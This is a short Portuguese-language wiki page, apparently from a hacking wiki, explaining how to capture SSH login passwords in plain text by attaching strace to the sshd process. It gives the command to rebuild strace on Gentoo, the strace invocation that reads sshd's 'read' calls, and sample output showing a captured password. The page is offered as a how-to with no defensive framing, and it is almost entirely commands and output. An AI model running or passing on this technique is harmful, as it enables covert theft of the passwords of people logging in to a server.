Exibindo a senha de uma conexão SSH em texto puro

De Wiki Hackstore

Requisito

O strace tem que estar compilado com useflag unwind. Se vc usa Gentoo e Funtoo:

echo "dev-util/strace aio perl unwind -static" >> /etc/portage/package.use ; emerge -1 strace


Exibindo a senha de uma autenticação via SSH com o strace

strace -f -e "read" -p <pid_sshd>

irá aparecer um resultado semelhante a esse:

[pid 17231] read(6, "l\0\0\0\1\0\0\0\7<senha em plain>", 16) = 16

ex:

[pid  2835] read(6, "l\0\0\0\1\0\0\0\5teste", 14) = 14